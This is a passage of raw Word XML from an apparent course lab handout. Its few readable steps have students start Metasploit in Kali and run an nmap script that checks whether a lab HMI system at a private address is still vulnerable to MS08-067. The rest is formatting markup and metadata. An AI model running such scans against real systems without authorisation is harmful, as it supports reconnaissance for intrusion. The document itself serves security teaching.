          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6635">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo msfconsole</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to start Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD493AE" w14:textId="3F6B0037" w:rsidR="00FB6635" w:rsidRDefault="00FB6635" w:rsidP="00FB6635">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6635">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>workspace metasploit_lab</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to restore the previously created metasploit_lab workspace's settings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12325D58" w14:textId="69EDB795" w:rsidR="00FB6635" w:rsidRDefault="00FB6635" w:rsidP="00FB6635">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6635">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>db_nmap -Pn --script smb-vuln-ms08-067.nse 10.0.255.101</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to determine if the HMI system is still vulnerable to the ms08-067 vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4680EB69" w14:textId="67E851B5" w:rsidR="00702B44" w:rsidRDefault="00FB6635" w:rsidP="00FB6635">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Take a screen shot that shows the entire Kali window</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and paste it into the </w:t>
      </w:r>
      <w:r>
        <w:t>lab form</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B69F20A" w14:textId="01FB5B73" w:rsidR="00FB6635" w:rsidRDefault="00FB6635" w:rsidP="00FB6635">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22EFFFE7" wp14:editId="005FB2D9">
            <wp:extent cx="5029200" cy="4137269"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="40368247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682478" name="Picture 403682478"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5029200" cy="4137269"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00FB6635">
      <w:footerReference w:type="default" r:id="rId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056DCE" w14:textId="77777777" w:rsidR="00DD0CEB" w:rsidRDefault="00DD0CEB" w:rsidP="00D955E9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0F20848E" w14:textId="77777777" w:rsidR="00DD0CEB" w:rsidRDefault="00DD0CEB" w:rsidP="00D955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6437B8" w14:textId="0BFCF114" w:rsidR="00D955E9" w:rsidRDefault="00D955E9">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
    <w:r>
      <w:tab/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01B95540" wp14:editId="18A85A34">
          <wp:extent cx="653374" cy="228600"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:docPr id="1694370068" name="Picture 1" descr="A black and white sign with a person in a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370068" name="Picture 1" descr="A black and white sign with a person in a circl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53374" cy="2286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8DD693" w14:textId="77777777" w:rsidR="00DD0CEB" w:rsidRDefault="00DD0CEB" w:rsidP="00D955E9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1F69AE67" w14:textId="77777777" w:rsidR="00DD0CEB" w:rsidRDefault="00DD0CEB" w:rsidP="00D955E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DB5C42"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D5084CE4"/>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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="079176A7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="57DE3B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15A93A8F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6F8A97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DA46518"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E544F3A2"/>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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="20743DE6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6E4CD18A"/>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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="31E71934"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4B7EAE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2EF361F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BB86ABDA"/>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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="35F8297E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E04C54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7597FE4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="75BE8AA4"/>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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="38E869E8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="90F226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6E8031A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="696A91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85642F3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="54CA333C"/>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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="486F0FDB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E1343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E916686"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="50A2E842"/>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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="55DE6F2D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B2CA81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69D0CB8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="420657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7017C5F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2014FB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5E1933AA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DE6EAE0A"/>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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="602C5242"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FE6060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6D71466"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="813C56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96E5F37"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="31DAC7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697E5DF8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6FC8B8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E0A3BC5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="80F4AB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6F6A1596"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BD7E29B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79CD723F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="594ACB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10912418">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1812750221">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="364404076">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1951162847">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1438134435">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="572206628">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1517695473">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1839727545">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="897285590">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="581454400">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1313559510">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="119760654">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1856068601">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1783457322">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="573199037">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="730234399">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1877503896">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="797069852">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="383796697">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1192111519">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="110976442">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="838420762">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1874225480">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="776097621">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="48663233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5E6A"/>
    <w:rsid w:val="00001C1C"/>
    <w:rsid w:val="000A390A"/>
    <w:rsid w:val="000C436D"/>
    <w:rsid w:val="00144C5F"/>
    <w:rsid w:val="00187E39"/>
    <w:rsid w:val="001F617C"/>
    <w:rsid w:val="00216769"/>
    <w:rsid w:val="00265B64"/>
    <w:rsid w:val="00313D2C"/>
    <w:rsid w:val="003216CA"/>
    <w:rsid w:val="003314A9"/>
    <w:rsid w:val="00392FBC"/>
    <w:rsid w:val="003D53B2"/>
    <w:rsid w:val="003D5846"/>
    <w:rsid w:val="003E2AA8"/>
    <w:rsid w:val="00415864"/>
    <w:rsid w:val="005B0573"/>
    <w:rsid w:val="0066233A"/>
    <w:rsid w:val="0070236E"/>
    <w:rsid w:val="00702B44"/>
    <w:rsid w:val="007146EC"/>
    <w:rsid w:val="00747D8E"/>
    <w:rsid w:val="00917B2A"/>
    <w:rsid w:val="00A6125E"/>
    <w:rsid w:val="00A90718"/>
    <w:rsid w:val="00AD4975"/>
    <w:rsid w:val="00B15010"/>
    <w:rsid w:val="00B62AB6"/>
    <w:rsid w:val="00B65E6A"/>
    <w:rsid w:val="00C1794C"/>
    <w:rsid w:val="00C3710E"/>
    <w:rsid w:val="00C37504"/>
    <w:rsid w:val="00C51D2C"/>
    <w:rsid w:val="00CB01C4"/>
    <w:rsid w:val="00CB686D"/>
    <w:rsid w:val="00CF4242"/>
    <w:rsid w:val="00D955E9"/>
    <w:rsid w:val="00DC067F"/>
    <w:rsid w:val="00DD0CEB"/>
    <w:rsid w:val="00E95505"/>
    <w:rsid w:val="00EB1387"/>
    <w:rsid w:val="00FB663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6BA697"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{873734F1-1F66-4381-B89C-3204221049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65E6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B65E6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65E6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65E6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65E6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65E6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65E6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65E6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65E6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65E6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B65E6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65E6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65E6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65E6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65E6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65E6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65E6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65E6A"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00B65E6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65E6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65E6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65E6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65E6A"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00B65E6A"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00B65E6A"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00B65E6A"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00B65E6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65E6A"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00B65E6A"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D955E9"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D955E9"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D955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55E9"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D955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55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0671850">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="490294094">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="534654943">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="602811129">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1072116834">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1093942424">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1192575403">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1289241966">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1311981159">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1378892613">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1646082098">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1657494769">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1658070215">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1953198061">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2006780758">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="20893056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yperlink" Target="https://www.nl.northweststate.edu/CAMO/software/VirtualMachine/VirtualBox/"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oleObject" Target="embeddings/Microsoft_Visio_2003-2010_Drawing.vsd"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.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E1A3E2-B754-4B16-B733-AF5AAA93DF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1071</TotalTime>
  <Pages>8</Pages>
  <Words>1299</Words>
  <Characters>7409</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Tony Hills</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Tony Hills</cp:lastModifiedBy>
  <cp:revision>30</cp:revision>
  <cp:lastPrinted>2024-07-16T17:25:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-16T15:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-18T14:28:00Z</dcterms:modified>
</cp:coreProperties>
</file>